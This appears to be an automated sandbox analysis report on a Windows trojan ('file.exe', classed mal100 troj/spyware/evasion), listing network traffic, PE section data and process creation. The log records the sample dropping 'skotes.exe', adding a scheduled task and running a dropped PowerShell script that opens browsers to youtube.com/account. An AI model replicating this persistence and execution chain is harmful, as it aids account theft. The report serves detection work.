Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50103 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50104 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown Network traffic detected: HTTP traffic on port 50115 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49819 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49981 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49985 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50058 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50095 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50094 version: TLS 1.2

System Summary

Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 26_2_000002B9C2C25877 NtQuerySystemInformation, 26_2_000002B9C2C25877
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 26_2_000002B9C2C447B2 NtQuerySystemInformation, 26_2_000002B9C2C447B2
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00ECE530 6_2_00ECE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00F078BB 6_2_00F078BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00F08860 6_2_00F08860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00F07049 6_2_00F07049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00EC4DE0 6_2_00EC4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00F031A8 6_2_00F031A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00F02D10 6_2_00F02D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00F0779B 6_2_00F0779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00EF7F36 6_2_00EF7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00EC4B30 6_2_00EC4B30
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 26_2_000002B9C2C25877 26_2_000002B9C2C25877
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 26_2_000002B9C2C447B2 26_2_000002B9C2C447B2
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 26_2_000002B9C2C44EDC 26_2_000002B9C2C44EDC
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 26_2_000002B9C2C447F2 26_2_000002B9C2C447F2
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9983289339237057
Source: file.exe Static PE information: Section: dkmnrssd ZLIB complexity 0.9946245387969589
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9983289339237057
Source: skotes.exe.0.dr Static PE information: Section: dkmnrssd ZLIB complexity 0.9946245387969589
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@103/297@58/27
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\KQGBYWk[1].ps1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6552:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: firefox.exe, 00000010.00000002.3336939375.000001A8B740D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3327834513.000001A8B6A50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT * FROM events WHERE timestamp BETWEEN date(:dateFrom) AND date(:dateTo);
Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7C43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B6190000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT sum(count) FROM events;
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT timestamp FROM events ORDER BY timestamp ASC LIMIT 1;
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE events SET count = count + 1 WHERE id = :id;
Source: file.exe ReversingLabs: Detection: 55%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1008615041\KQGBYWk.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com/account
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1896,i,6279673356786267124,1049991761834270204,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=2096,i,9265304522972539897,9185506368956134932,262144 /prefetch:3
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com/account
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:3
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2228 -parentBuildID 20230927232528 -prefsHandle 2152 -prefMapHandle 2132 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a3c6f543-2f64-46ba-bc00-280bf6150280} 2928 "\\.\pipe\gecko-crash-server-pipe.2928" 1a8a5f6cf10 socket
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6864 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6896 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:8
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1136 -parentBuildID 20230927232528 -prefsHandle 4464 -prefMapHandle 4460 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {28e04a16-f2f3-4c95-9817-ee287afde24a} 2928 "\\.\pipe\gecko-crash-server-pipe.2928" 1a8b8c3fb10 rdd
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=6812 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7660 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=price_comparison_service.mojom.DataProcessor --lang=en-GB --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=7708 --field-trial-handle=2220,i,11003867932119909055,5800491928789233358,262144 /prefetch:8
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3164 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5300 -prefMapHandle 3188 -prefsLen 33119 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f24f9574-f2ff-4886-877e-c3019b1407de} 2928 "\\.\pipe\gecko-crash-server-pipe.2928" 1a8b74c0910 utility
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4112 --field-trial-handle=1896,i,6279673356786267124,1049991761834270204,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4504 --field-trial-handle=1896,i,6279673356786267124,1049991761834270204,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1008615041\KQGBYWk.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com/account
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1896,i,6279673356786267124,1049991761834270204,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4112 --field-trial-handle=1896,i,6279673356786267124,1049991761834270204,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4504 --field-trial-handle=1896,i,6279673356786267124,1049991761834270204,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=2096,i,9265304522972539897,9185506368956134932,262144 /prefetch:3
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
